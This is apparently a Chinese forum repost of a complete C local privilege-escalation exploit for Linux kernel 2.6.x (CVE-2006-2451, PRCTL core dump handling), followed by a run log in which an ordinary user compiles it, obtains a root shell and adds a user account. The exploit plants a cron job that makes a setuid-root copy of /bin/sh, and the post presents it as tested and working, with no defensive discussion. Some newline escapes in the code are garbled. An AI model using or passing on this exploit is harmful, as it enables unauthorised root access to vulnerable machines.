Linux Kernel 2.6x 本地溢出代碼 今天測試了一下,效果不錯

火星人 @ 2014-03-09 , reply:0


  1. /*****************************************************/
  2. /* Local r00t Exploit for: */
  3. /* Linux Kernel PRCTL Core Dump Handling */
  4. /* ( BID 18874 / CVE-2006-2451 ) */
  5. /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
  6. /* By: */
  7. /* - dreyer <luna@aditel.org> (main PoC code) */
  8. /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
  9. /* [ 10.Jul.2006 ] */
  10. /*****************************************************/
  11. #include <stdio.h>
  12. #include <sys/time.h>
  13. #include <sys/resource.h>
  14. #include <unistd.h>
  15. #include <

    linux/prctl.h>
  16. #include <stdlib.h>
  17. #include <sys/types.h>
  18. #include <signal.h>
  19. char *payload="nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren";
  20. int main() {
  21. int child;
  22. struct rlimit corelimit;
  23. printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00tn");
  24. printf("By: dreyer & RoMaNSoFtn");
  25. printf("[ 10.Jul.2006 ]nn");
  26. corelimit.rlim_cur = RLIM_INFINITY;
  27. corelimit.rlim_max = RLIM_INFINITY;
  28. setrlimit(RLIMIT_CORE, &corelimit);
  29. printf("[*] Creating Cron entryn");
  30. if ( !( child = fork() )) {
  31. chdir("/etc/cron.d");
  32. prctl(PR_SET_DUMPABLE, 2);
  33. sleep(200);
  34. exit(1);
  35. }
  36. kill(child, SIGSEGV);
  37. printf("[*] Sleeping for aprox. one minute (** please wait **)n");
  38. sleep(62);
  39. printf("[*] Running shell (remember to remove /tmp/sh when finished) n");
  40. system("/tmp/sh -p");
  41. }

運行測試:

[fred@fedora ~]$ uname -a
Linux fedora 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[fred@fedora ~]$ id
uid=500(fred) gid=500(fred) groups=500(fred)
[fred@fedora ~]$ ls
amsn_received Desktop linux.bin pics rs_prctl_kernel.c vmware
[fred@fedora ~]$ gcc -o rs_prctl_kernel rs_prctl_kernel.c
[fred@fedora ~]$ ls
amsn_received Desktop linux.bin pics rs_prctl_kernel rs_prctl_kernel.c vmware
[fred@fedora ~]$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

Creating Cron entry

Sleeping for aprox. one minute (** please wait **)

Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# whoami
root
sh-3.1# id
uid=500(fred) gid=500(fred) euid=0(root) groups=500(fred)
sh-3.1# /usr/sbin/useradd test


sh-3.1# exit
exit





[火星人 via ] Linux Kernel 2.6x 本地溢出代碼 今天測試了一下,效果不錯已經有512次圍觀

http://www.coctec.com/docs/linux/show-post-51462.html